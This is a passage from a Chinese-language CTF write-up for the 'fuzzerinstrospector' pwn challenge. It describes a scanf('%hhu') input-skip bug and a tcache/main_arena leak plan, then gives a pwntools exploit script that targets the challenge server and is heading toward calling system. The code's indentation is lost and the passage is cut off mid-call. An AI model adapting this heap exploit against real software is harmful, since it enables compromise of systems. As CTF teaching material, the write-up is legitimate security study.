fuzzerinstrospector
题目的功能很好分析,但是漏洞点之前没有见过,根据程序流程发现是scanf("%hhu",&x);
存在漏洞,可以在每次新申请堆的时候跳过写入内容,保留原有堆的值。%hhu代表unsigned char,在输入为±符号的时候,输入是跳过的,并且不影响后续的程序流
我的解题思路
- 第一步:申请9个堆,然后释放9个堆,让tcache的队列填满
- 第二步:申请7个堆,这个时候tcache会在最开始接近top chunk的7、8编号堆进行合并,并且保留main_arena地址
- 第三步:利用scanf的漏洞保留main_arena值,并且通过map表泄露
- 第四步:利用隐藏的功能实现system函数调用
# -*- coding: utf-8 -*-
from pwn import *
import pwnlib
from LibcSearcher import *
# Target is a 64-bit Linux binary; debug log level makes pwntools print every
# byte sent and received on the tube, which is what makes the remote
# interaction below auditable.
context.update(os="linux", arch="amd64", log_level="debug")
#context_terminal = ["terminator","-x","sh","-c"]
def FuzzerBitmap_Creatio(index,content,bitmap,mod):
    """Drive menu option 1 (create) of the challenge binary over ``conn``.

    Prompt sequence, in order: ``Your choice:`` -> ``1``; ``Index:`` ->
    ``index``; eight ``:``-terminated prompts, one byte of ``content``
    each; ``Bitmap:`` -> ``bitmap`` NUL-padded to 0x100 bytes.

    Args:
        index: slot number answered to the ``Index:`` prompt.
        content: indexable sequence; exactly ``content[0..7]`` are sent,
            so anything shorter raises ``IndexError`` mid-conversation.
        bitmap: data for the ``Bitmap:`` prompt. ``str.ljust`` pads but
            never truncates, so pass at most 0x100 bytes.
        mod: truthy -> each byte is sent as its decimal ``ord`` value;
            falsy -> the character itself is sent. The write-up relies on
            the falsy path with ``"+"`` because ``scanf("%hhu")`` consumes a
            sign without storing anything.

    Uses the module-level ``conn`` tube set up in ``__main__``; returns None.
    """
    def encode(ch):
        # One place to pick the wire form of a single content byte.
        return str(ord(ch)) if mod else ch

    conn.recvuntil("Your choice:")
    conn.sendline("1")
    conn.recvuntil("Index:")
    conn.sendline(str(index))
    for pos in range(8):
        conn.recvuntil(":")
        conn.sendline(encode(content[pos]))
    conn.recvuntil("Bitmap:")
    conn.send(bitmap.ljust(0x100, "\x00"))
def Edit_FuzzerBitmap(index,content,bitmap):
    """Drive menu option 2 (edit) on slot ``index`` over ``conn``.

    Same prompt sequence as ``FuzzerBitmap_Creatio`` with ``mod`` truthy:
    ``content[0..7]`` are each sent as a decimal ``ord`` value after a
    ``:`` prompt, then ``bitmap`` is sent NUL-padded (never truncated) to
    0x100 bytes at the ``Bitmap:`` prompt. Returns None.
    """
    conn.recvuntil("Your choice:")
    conn.sendline("2")
    conn.recvuntil("Index:")
    conn.sendline(str(index))
    for pos in range(8):
        byte = content[pos]
        conn.recvuntil(":")
        conn.sendline(str(ord(byte)))
    conn.recvuntil("Bitmap:")
    conn.send(bitmap.ljust(0x100, "\x00"))
def Check_FuzzerBitmap(index):
    """Select menu option 3 (check) for slot ``index`` over ``conn``.

    Only the two prompts are answered; whatever the binary prints back is
    left on the tube for the caller to read. Returns None.
    """
    exchanges = (("Your choice:", "3"), ("Index:", str(index)))
    for prompt, answer in exchanges:
        conn.recvuntil(prompt)
        conn.sendline(answer)
def Delete_FuzzerBitmap(index):
    """Select menu option 4 (delete) for slot ``index`` over ``conn``.

    Answers ``Your choice:`` with ``4`` and ``Index:`` with ``index``;
    nothing is read back. Returns None.
    """
    exchanges = (("Your choice:", "4"), ("Index:", str(index)))
    for prompt, answer in exchanges:
        conn.recvuntil(prompt)
        conn.sendline(answer)
def Attack(paylaod):
    """Select menu option 6 and send ``paylaod`` on the next line over ``conn``.

    Unlike the other helpers no prompt is consumed between choosing ``6``
    and sending the payload; the write-up calls this the hidden function.
    The parameter name (sic) is kept as callers may pass it by keyword.
    ``paylaod`` is passed through ``str`` before sending. Returns None.
    """
    conn.recvuntil("Your choice:")
    for line in ("6", str(paylaod)):
        conn.sendline(line)
if __name__ == '__main__':
HOST = '39.105.185.193'
PORT = 30007
conn = remote(HOST ,PORT)
#conn = process(['/home/assassin/Desktop/program/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/ld-2.27.so','./ciscn_final_3'], env = {'LD_PRELOAD' : '/home/assassin/Desktop/program/glibc-all-in-one/libs/2.27-3ubuntu1_amd64/libc-2.27.so'})
#conn = process(['/home/assassin/Desktop/program/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/ld-2.23.so','./mrctf2020_shellcode_revenge'], env = {'LD_PRELOAD' : '/home/assassin/Desktop/program/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc-2.23.so'})
#conn = process("./fuzzerinstrospector")
#pwnlib.gdb.attach(conn,"b main") #b *0x400ECF
pause()
table = ""
for i in range(0,256):
table += chr(i)
FuzzerBitmap_Creatio(0,"A"*8,table,1)
FuzzerBitmap_Creatio(1,"B"*8,table,1)
FuzzerBitmap_Creatio(2,"C"*8,table,1)
FuzzerBitmap_Creatio(3,"D"*8,table,1)
FuzzerBitmap_Creatio(4,"D"*8,table,1)
FuzzerBitmap_Creatio(5,"D"*8,table,1)
FuzzerBitmap_Creatio(6,"D"*8,table,1)
FuzzerBitmap_Creatio(7,"D"*8,table,1)
FuzzerBitmap_Creatio(8,"D"*8,table,1)
Delete_FuzzerBitmap(0)
Delete_FuzzerBitmap(1)
Delete_FuzzerBitmap(2)
Delete_FuzzerBitmap(3)
Delete_FuzzerBitmap(4)
Delete_FuzzerBitmap(5)
Delete_FuzzerBitmap(6)
Delete_FuzzerBitmap(7)
Delete_FuzzerBitmap(8)
FuzzerBitmap_Creatio(0,"+"*8,table,0)
FuzzerBitmap_Creatio(1,"+"*8,table,0)
FuzzerBitmap_Creatio(2,"+"*8,table,